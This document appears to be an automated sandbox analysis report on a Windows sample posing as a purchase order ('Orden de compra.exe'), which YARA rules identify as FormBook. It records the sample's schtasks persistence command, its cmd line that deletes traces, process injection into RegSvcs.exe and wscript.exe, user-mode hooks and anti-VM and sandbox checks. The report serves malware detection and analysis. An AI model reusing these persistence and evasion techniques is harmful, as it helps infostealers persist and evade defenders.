          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9F20 NtCreateFile,8_2_005A9F20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9FD0 NtReadFile,8_2_005A9FD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA04A NtClose,8_2_005AA04A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA01A NtReadFile,8_2_005AA01A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA0FA NtAllocateVirtualMemory,8_2_005AA0FA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9FCC NtReadFile,8_2_005A9FCC
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00A96648
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00A999B0
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00A96639
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00A9C8A8
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00A99670
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05776BC0
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_0577C138
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_057761A8
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05776198
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05770040
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05770007
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05776BB1
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05770292
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D163
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D166
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D9B9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041DB4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041DC86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00409E2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00409E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FCB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01071002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0108E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_010820A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FD4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_010828EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FBF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01082B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0107DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_010703DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FEEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_010822AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01082D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01081D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_010825DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FC841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FCD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0107D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FE2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FB0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0108DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00FD6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01081FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0107D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01082EF7
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A820A0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B220A8
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A6B090
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B11002
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A6841F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A82581
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A6D5E0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A50D20
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A74120
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A5F900
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B22D07
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B21D55
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B222AE
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B22EF7
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A76E30
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A8EBB0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B21FF1
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04B22B28
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD163
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD166
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005ADB48
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00592D90
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00592D8A
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00599E30
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00599E2B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00592FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00FBB150 appears 39 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04A5B150 appears 35 times
          Source: Orden de compra.exe | Binary or memory string: OriginalFilename vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameexag vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346473645.0000000005E30000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346473645.0000000005E30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000000.327245802.0000000000042000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename5a0H.exe6 vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346049205.0000000005D30000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.345646763.0000000005600000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKedermister.dllT vs Orden de compra.exe
          Source: Orden de compra.exe | Binary or memory string: OriginalFilename5a0H.exe6 vs Orden de compra.exe
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/4@4/3
          Source: C:\Users\user\Desktop\Orden de compra.exe | File created: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exe
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_01
          Source: C:\Users\user\Desktop\Orden de compra.exe | Mutant created: \Sessions\1\BaseNamedObjects\TXXpnYSTVSFTd
          Source: C:\Users\user\Desktop\Orden de compra.exe | File created: C:\Users\user\AppData\Local\Temp\tmp97AC.tmp
          Source: Orden de compra.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Orden de compra.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Orden de compra.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Orden de compra.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Orden de compra.exe | ReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\Orden de compra.exe | File read: C:\Users\user\Desktop\Orden de compra.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Orden de compra.exe 'C:\Users\user\Desktop\Orden de compra.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'
          Source: C:\Users\user\Desktop\Orden de compra.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Users\user\Desktop\Orden de compra.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Orden de compra.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Orden de compra.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Orden de compra.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: RegSvcs.exe, 00000004.00000002.384491568.0000000000B5A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.371533234.000000000E620000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: wscript.exe, 00000008.00000002.595145655.0000000004F5F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.384819265.0000000000F90000.00000040.00000001.sdmp, wscript.exe, 00000008.00000002.594715454.0000000004B4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wscript.exe
          Source: Binary string: wscript.pdb source: RegSvcs.exe, 00000004.00000002.384491568.0000000000B5A000.00000004.00000020.sdmp
          Source: Binary string: RegSvcs.pdb source: wscript.exe, 00000008.00000002.595145655.0000000004F5F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.371533234.000000000E620000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00042E84 push ecx; iretd 0_2_00042E85
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00047585 push edi; ret 0_2_0004758E
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_00047091 push ebx; retf 0_2_00047092
          Source: C:\Users\user\Desktop\Orden de compra.exe | Code function: 0_2_05774856 push edx; iretd 0_2_05774857
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D075 push eax; ret 4_2_0041D0C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0040E829 push ss; ret 4_2_0040E82B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D0C2 push eax; ret 4_2_0041D0C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D0CB push eax; ret 4_2_0041D132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041D12C push eax; ret 4_2_0041D132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041719A push ebp; ret 4_2_0041719B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00416B67 push FFFFFF90h; ret 4_2_00416B76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00403BC4 push es; iretd 4_2_00403BCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00416C7A push ebp; retf 4_2_00416C85
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041BCAA push ecx; retf 4_2_0041BCAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00406E46 push eax; iretd 4_2_00406E4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00416690 push es; iretd 4_2_00416691
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00416757 push ebx; retf 4_2_00416758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0100D0D1 push ecx; ret 4_2_0100D0E4
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AAD0D1 push ecx; ret 8_2_04AAD0E4
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD075 push eax; ret 8_2_005AD0C8
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_0059E829 push ss; ret 8_2_0059E82B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD0CB push eax; ret 8_2_005AD132
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD0C2 push eax; ret 8_2_005AD0C8
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005AD12C push eax; ret 8_2_005AD132
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005A719A push ebp; ret 8_2_005A719B
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005A6B67 push FFFFFF90h; ret 8_2_005A6B76
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00593BC4 push es; iretd 8_2_00593BCA
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005A6C7A push ebp; retf 8_2_005A6C85
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005ABCAA push ecx; retf 8_2_005ABCAC
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00596E46 push eax; iretd 8_2_00596E4F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005A6690 push es; iretd 8_2_005A6691
          Source: initial sample | Static PE information: section name: .text entropy: 7.2539255088
          Source: C:\Users\user\Desktop\Orden de compra.exe | File created: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exe (dropped file)

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE2
          Source: C:\Users\user\Desktop\Orden de compra.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match; File source: 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.343034095.00000000024DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Orden de compra.exe PID: 6460, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe; RDTSC instruction interceptor: First address: 00000000005998E4 second address: 00000000005998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe; RDTSC instruction interceptor: First address: 0000000000599B4E second address: 0000000000599B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Orden de compra.exe; File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00409A80 rdtsc 4_2_00409A80
Source: C:\Users\user\Desktop\Orden de compra.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Orden de compra.exe TID: 6456; Thread sleep time: -54657s >= -30000s
Source: C:\Users\user\Desktop\Orden de compra.exe TID: 2524; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6348; Thread sleep count: 31 > 30
Source: C:\Windows\explorer.exe TID: 6348; Thread sleep time: -62000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 7008; Thread sleep time: -44000s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\explorer.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: explorer.exe, 00000005.00000000.367465423.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.367438434.00000000083EB000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000002.607624484.0000000006408000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: vmware
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000005.00000000.367438434.00000000083EB000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000002.607624484.0000000006408000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
